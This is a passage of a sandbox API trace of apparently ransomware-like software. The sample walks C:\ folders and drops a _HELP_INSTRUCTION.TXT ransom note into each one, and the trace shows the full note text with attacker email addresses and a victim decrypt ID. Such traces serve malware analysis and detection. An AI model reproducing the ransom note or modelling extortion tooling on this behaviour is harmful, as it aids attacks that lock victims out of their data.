returned="$Recycle.Bin" [0226.349] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0226.349] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.349] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.349] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0226.349] SetErrorMode (uMode=0x1) returned 0x1 [0226.349] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0226.349] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0226.349] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0226.349] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0226.349] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.350] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0226.350] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0226.350] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0226.350] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0226.350] StrStrW (lpFirst="C:\\Boot\\", lpSrch="Desktop") returned 0x0 [0226.350] StrStrW (lpFirst="C:\\Boot\\", lpSrch="DESKTOP") returned 0x0 [0226.350] SetErrorMode (uMode=0x1) returned 0x1 [0226.350] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Boot\\_HELP_INSTRUCTION.TXT") returned 29 [0226.350] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.350] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.350] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.350] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caea68, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caea68*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.350] RegCloseKey (hKey=0x1068) returned 0x0 [0226.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.350] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.350] CreateFileW (lpFileName="C:\\Boot\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\boot\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1068 [0226.351] CloseHandle (hObject=0x1068) returned 1 [0226.351] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.351] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0226.351] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0226.351] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.351] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.351] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0226.351] SetErrorMode (uMode=0x1) returned 0x1 [0226.351] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0226.351] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0226.351] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0226.351] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0226.351] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.351] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.351] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0226.351] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0226.351] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="Desktop") returned 0x0 [0226.351] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="DESKTOP") returned 0x0 [0226.351] SetErrorMode (uMode=0x1) returned 0x1 [0226.351] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT") returned 35 [0226.351] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.352] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.352] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.352] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caec98, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caec98*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.352] RegCloseKey (hKey=0x1068) returned 0x0 [0226.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.352] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.352] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0226.352] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.352] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.352] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.352] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.352] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0226.352] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0226.353] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.353] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.353] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0226.353] SetErrorMode (uMode=0x1) returned 0x1 [0226.353] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0226.353] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0226.353] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0226.353] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0226.353] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.353] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.353] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0226.353] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0226.353] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="Desktop") returned 0x0 [0226.353] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="DESKTOP") returned 0x0 [0226.353] SetErrorMode (uMode=0x1) returned 0x1 [0226.353] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT") returned 47 [0226.353] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.353] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.353] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.353] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caeec8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caeec8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.354] RegCloseKey (hKey=0x1068) returned 0x0 [0226.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.354] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.354] CreateFileW (lpFileName="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\documents and settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1068 [0226.354] CloseHandle (hObject=0x1068) returned 1 [0226.354] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.354] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.354] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.354] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.354] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0226.354] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0226.354] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.354] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.354] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0226.354] SetErrorMode (uMode=0x1) returned 0x1 [0226.354] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0226.354] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0226.354] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0226.354] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0226.354] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.354] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.355] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0226.355] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0226.355] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="Desktop") returned 0x0 [0226.355] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="DESKTOP") returned 0x0 [0226.355] SetErrorMode (uMode=0x1) returned 0x1 [0226.355] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\MSOCache\\_HELP_INSTRUCTION.TXT") returned 33 [0226.355] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.355] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.355] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.355] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caf0f8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caf0f8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.355] RegCloseKey (hKey=0x1068) returned 0x0 [0226.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.355] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.355] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0226.355] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.356] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.356] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.356] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.356] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.356] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0226.356] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0226.356] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.356] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.356] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0226.356] SetErrorMode (uMode=0x1) returned 0x1 [0226.356] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0226.356] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0226.356] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0226.356] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0226.356] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.356] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.356] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0226.356] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0226.356] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="Desktop") returned 0x0 [0226.356] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="DESKTOP") returned 0x0 [0226.356] SetErrorMode (uMode=0x1) returned 0x1 [0226.356] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT") returned 33 [0226.356] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.357] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.357] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.357] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caf328, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caf328*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.357] RegCloseKey (hKey=0x1068) returned 0x0 [0226.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.357] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.357] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0226.357] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.357] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.357] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.357] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.357] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0226.357] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0226.357] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.357] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.357] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0226.357] SetErrorMode (uMode=0x1) returned 0x1 [0226.357] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0226.358] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0226.358] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0226.358] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0226.358] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.358] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0226.358] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0226.358] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0226.358] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0226.358] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="Desktop") returned 0x0 [0226.358] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="DESKTOP") returned 0x0 [0226.358] SetErrorMode (uMode=0x1) returned 0x1 [0226.358] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files\\_HELP_INSTRUCTION.TXT") returned 38 [0226.358] GetUserNameW (in: lpBuffer=0x17c3f8, 